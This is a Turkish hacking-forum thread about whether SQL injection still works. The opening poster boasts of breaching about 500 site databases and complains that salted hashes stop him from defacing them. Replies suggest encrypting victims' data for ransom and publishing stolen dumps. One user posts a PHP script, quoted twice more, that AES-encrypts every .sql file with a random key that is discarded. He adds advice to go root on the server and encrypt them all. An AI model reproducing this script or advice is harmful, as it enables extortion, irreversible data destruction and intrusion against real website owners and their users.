Artık SQL açığı devri bitti mi?

44shell

44shell

Yeni üye
27 Eki 2023
19
7
root@44shell
Merhabalar! Uzun zamandır bu konuyu açmayı düşünüyordum ancak bugüne nasip oldu. Yıl olmuş 2024 SQL mi kaldı der gibisiniz. Kaldı, ama bir sorun var. Son 3 ay içerisinde en az 500 sitenin veritabanına girmişimdir ancak 1 tane bile index atamadım. Çünkü artık DB adminleri şifrelerini hash'e ek olarak salt ile de koruyorlar. Salt ise işi tamamen bozuyor. Çünkü salting işlemi uygulandığı zaman hepimizin kullandığı hashes gibi siteler hash'i kıramıyor. Kendimiz dictionary saldırıları ile kırmayı denediğimizde ise fazlasıyla zaman alıyor ancak yine de çözülemiyor. Benim sorunum bu. Asla ve asla admin şifresinin hash'ini kıramıyorum. Cevaplarınızı bekliyorum şimdiden teşekkürler.
 
Tarihe göre sırala Oylara göre sırala
aslan aslan

aslan aslan

Basın&Medya Ekibi Asistanı
1 Şub 2023
677
262
44shell' Alıntı:
Merhabalar! Uzun zamandır bu konuyu açmayı düşünüyordum ancak bugüne nasip oldu. Yıl olmuş 2024 SQL mi kaldı der gibisiniz. Kaldı, ama bir sorun var. Son 3 ay içerisinde en az 500 sitenin veritabanına girmişimdir ancak 1 tane bile index atamadım. Çünkü artık DB adminleri şifrelerini hash'e ek olarak salt ile de koruyorlar. Salt ise işi tamamen bozuyor. Çünkü salting işlemi uygulandığı zaman hepimizin kullandığı hashes gibi siteler hash'i kıramıyor. Kendimiz dictionary saldırıları ile kırmayı denediğimizde ise fazlasıyla zaman alıyor ancak yine de çözülemiyor. Benim sorunum bu. Asla ve asla admin şifresinin hash'ini kıramıyorum. Cevaplarınızı bekliyorum şimdiden teşekkürler.
Genişletmek için tıkla ...
bitmez..
 
Oyla 0 Downvote
Butcherb3y

Butcherb3y

Uzman üye
1 Eyl 2022
1,593
1,185
Anıtkabir
44shell' Alıntı:
Merhabalar! Uzun zamandır bu konuyu açmayı düşünüyordum ancak bugüne nasip oldu. Yıl olmuş 2024 SQL mi kaldı der gibisiniz. Kaldı, ama bir sorun var. Son 3 ay içerisinde en az 500 sitenin veritabanına girmişimdir ancak 1 tane bile index atamadım. Çünkü artık DB adminleri şifrelerini hash'e ek olarak salt ile de koruyorlar. Salt ise işi tamamen bozuyor. Çünkü salting işlemi uygulandığı zaman hepimizin kullandığı hashes gibi siteler hash'i kıramıyor. Kendimiz dictionary saldırıları ile kırmayı denediğimizde ise fazlasıyla zaman alıyor ancak yine de çözülemiyor. Benim sorunum bu. Asla ve asla admin şifresinin hash'ini kıramıyorum. Cevaplarınızı bekliyorum şimdiden teşekkürler.
Genişletmek için tıkla ...
Hayır sql bitmedi hala devlet siteleri vb gibi yerlerde var sadece hashli şifrelenmiş oluyor ve bazı hash sitelerinde basit olanlar çözülsede diğerleri çözülmüyor buda bizi yoruyor ve sıkıyor keşke hemen kırılabilir olsa bence dbs ye önemli bişi varsa bunu çekip yayınlama daha kârlı bence
 
Oyla 0 Downvote
'Anka

'Anka

Basın&Medya Ekibi Kıdemli
8 Eyl 2021
3,340
2,519
SQL, günümüzde hâlâ en yaygın kullanılan veritabanı yönetim sistemidir. Bu nedenle, SQL açıkları da hâla en yaygın siber güvenlik tehditlerinden biridir. Kısacası, SQL açıkları devrinin bittiği söylenemez.
 
Oyla 0 Downvote
T

tamam ağa

Uzman üye
7 Haz 2023
1,474
841
44shell' Alıntı:
Merhabalar! Uzun zamandır bu konuyu açmayı düşünüyordum ancak bugüne nasip oldu. Yıl olmuş 2024 SQL mi kaldı der gibisiniz. Kaldı, ama bir sorun var. Son 3 ay içerisinde en az 500 sitenin veritabanına girmişimdir ancak 1 tane bile index atamadım. Çünkü artık DB adminleri şifrelerini hash'e ek olarak salt ile de koruyorlar. Salt ise işi tamamen bozuyor. Çünkü salting işlemi uygulandığı zaman hepimizin kullandığı hashes gibi siteler hash'i kıramıyor. Kendimiz dictionary saldırıları ile kırmayı denediğimizde ise fazlasıyla zaman alıyor ancak yine de çözülemiyor. Benim sorunum bu. Asla ve asla admin şifresinin hash'ini kıramıyorum. Cevaplarınızı bekliyorum şimdiden teşekkürler.
Genişletmek için tıkla ...
keşke veritabanını şifreleyip fidye isteseydin.
 
Oyla 0 Downvote
44shell

44shell

Yeni üye
27 Eki 2023
19
7
root@44shell
tamam ağa' Alıntı:
Nasıl yapacağın sana kalmış PHP'de kullanabilirsin.

şurayı Türkçeye çevirip okursan az çok anlarsın ne demek istiyorum.

Ransomware - Wikipedia

en.wikipedia.org en.wikipedia.org
Genişletmek için tıkla ...
Hocam ransomware'in ne olduğunu biliyorum, zamanında ransomware üretmeyi denemişliğim de var. Fakat SQL açığı üzerinden böyle bir şey yapmak mümkün değildir bence. Eğer mümkünse anlatabilirsiniz.
 
Oyla 0 Downvote
T

tamam ağa

Uzman üye
7 Haz 2023
1,474
841
44shell' Alıntı:
Hocam ransomware'in ne olduğunu biliyorum, zamanında ransomware üretmeyi denemişliğim de var. Fakat SQL açığı üzerinden böyle bir şey yapmak mümkün değildir bence. Eğer mümkünse anlatabilirsiniz.
Genişletmek için tıkla ...
bak şimdi mantık basit SQL injectionda komut çalıştırabiliyoruz değil mi? o halde verileri silip veya manipüle edebiliriz.
SQL de update komutu bulunur ilgili satırları bulduktan sonra gerisi çocuk oyuncağı haline geliyor.

önce veriyi çek ardından şifrele ve yeniden yaz.
fakat veri tabanı yapısını çok iyi analiz etmek lazım belki değiştirilen verilerin saklandığı bir veri tabanı olabilir(tablo desek daha anlaşılır olur) eğer bu varsa saldırımız başarısız demektir.

SQL update komutu için buraya bakabilirsin.

www.w3schools.com

SQL UPDATE Statement

W3Schools offers free online tutorials, references and exercises in all the major languages of the web. Covering popular subjects like HTML, CSS, JavaScript, Python, SQL, Java, and many, many more.
www.w3schools.com www.w3schools.com

SQL injectionla alakalı bulduğum update,delete örnekleri bulunan bir PDF



bonus olarak sana bulunduğu dizindeki .sql dosyalarını AES ile şifreleyen basit bir script verebilirim.

geriside sana kalmış scripti geliştirirsin sunucuda root olup bütün .SQL dosyalarını şifreleyebilirsin.


PHP: 
<?php

// tamam ağam

foreach (glob('*.sql') as $file) {

   
    $content = file_get_contents($file);

 
    $key = random_bytes(32);

    // Dosyayı şifrele
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('aes-256-cbc'));
    $encrypted = openssl_encrypt($content, 'aes-256-cbc', $key, 0, $iv);

   
    file_put_contents($file, $iv . $encrypted);
}

?>
 
Oyla 0 Downvote
P

prooL

Ziyaretçi
tamam ağa' Alıntı:
Hayır mümkün, eğer SQL veri tabanından veri çekip görebiliyorsak silede biliriz.
bu SQL fidyeciliği hem güzel hemde tehlikeli iş.
Genişletmek için tıkla ...
kanka sen nasıl çekiyorsun sql verilerini sqlmapten çeksen bile sadece okuma yetkin var user şifresini bulamadıktan sonra zaten basit mantık sadece hata varsa buluyor ve o hatayı kullanarak veritabanından bilgi istiyor gibi davranıyor yani delete yada truncatles komutlarını çalıştırabileceğini zanletmiyorum
 
Moderatör tarafında düzenlendi:
Oyla 0 Downvote
BraveHeart98795

BraveHeart98795

Üye
16 Eki 2020
114
23
/var/www/html
tamam ağa' Alıntı:
bak şimdi mantık basit SQL injectionda komut çalıştırabiliyoruz değil mi? o halde verileri silip veya manipüle edebiliriz.
SQL de update komutu bulunur ilgili satırları bulduktan sonra gerisi çocuk oyuncağı haline geliyor.

önce veriyi çek ardından şifrele ve yeniden yaz.
fakat veri tabanı yapısını çok iyi analiz etmek lazım belki değiştirilen verilerin saklandığı bir veri tabanı olabilir(tablo desek daha anlaşılır olur) eğer bu varsa saldırımız başarısız demektir.

SQL update komutu için buraya bakabilirsin.

www.w3schools.com

SQL UPDATE Statement

W3Schools offers free online tutorials, references and exercises in all the major languages of the web. Covering popular subjects like HTML, CSS, JavaScript, Python, SQL, Java, and many, many more.
www.w3schools.com www.w3schools.com

SQL injectionla alakalı bulduğum update,delete örnekleri bulunan bir PDF



bonus olarak sana bulunduğu dizindeki .sql dosyalarını AES ile şifreleyen basit bir script verebilirim.

geriside sana kalmış scripti geliştirirsin sunucuda root olup bütün .SQL dosyalarını şifreleyebilirsin.


PHP: 
<?php

// tamam ağam

foreach (glob('*.sql') as $file) {

  
    $content = file_get_contents($file);

 
    $key = random_bytes(32);

    // Dosyayı şifrele
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('aes-256-cbc'));
    $encrypted = openssl_encrypt($content, 'aes-256-cbc', $key, 0, $iv);

  
    file_put_contents($file, $iv . $encrypted);
}

?>
Genişletmek için tıkla ...
keşke php bilseydim daha iyi anlardım :).
 
Oyla 0 Downvote
D

DOKTR1N

Moderatör
1 Tem 2020
1,472
761
Bin atlı akınlarda çocuklar gibi şendik.
Öncelikle merhaba değerli üye;

SQL açıkları (SQL injection), web uygulamalarındaki güvenlik zafiyetlerinden biridir ve bu tür açıkların önüne geçmek için çeşitli güvenlik önlemleri alınmış olsa da, tamamen ortadan kalktığı söylenemez. SQL açıkları, uygulama geliştiricilerinin ve sistem yöneticilerinin dikkatli olmalarını ve güvenlik önlemleri almalarını gerektiren sürekli bir tehdit olarak varlığını sürdürmektedir.

İyi forumlar dilerim...
 
Oyla 0 Downvote
44shell

44shell

Yeni üye
27 Eki 2023
19
7
root@44shell
tamam ağa' Alıntı:
bak şimdi mantık basit SQL injectionda komut çalıştırabiliyoruz değil mi? o halde verileri silip veya manipüle edebiliriz.
SQL de update komutu bulunur ilgili satırları bulduktan sonra gerisi çocuk oyuncağı haline geliyor.

önce veriyi çek ardından şifrele ve yeniden yaz.
fakat veri tabanı yapısını çok iyi analiz etmek lazım belki değiştirilen verilerin saklandığı bir veri tabanı olabilir(tablo desek daha anlaşılır olur) eğer bu varsa saldırımız başarısız demektir.

SQL update komutu için buraya bakabilirsin.

www.w3schools.com

SQL UPDATE Statement

W3Schools offers free online tutorials, references and exercises in all the major languages of the web. Covering popular subjects like HTML, CSS, JavaScript, Python, SQL, Java, and many, many more.
www.w3schools.com www.w3schools.com

SQL injectionla alakalı bulduğum update,delete örnekleri bulunan bir PDF



bonus olarak sana bulunduğu dizindeki .sql dosyalarını AES ile şifreleyen basit bir script verebilirim.

geriside sana kalmış scripti geliştirirsin sunucuda root olup bütün .SQL dosyalarını şifreleyebilirsin.


PHP: 
<?php

// tamam ağam

foreach (glob('*.sql') as $file) {

  
    $content = file_get_contents($file);

 
    $key = random_bytes(32);

    // Dosyayı şifrele
    $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('aes-256-cbc'));
    $encrypted = openssl_encrypt($content, 'aes-256-cbc', $key, 0, $iv);

  
    file_put_contents($file, $iv . $encrypted);
}

?>
Genişletmek için tıkla ...
Çok sağolun hocam keşke daha önceden öğrenseymişim 😃
 
Oyla 0 Downvote
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.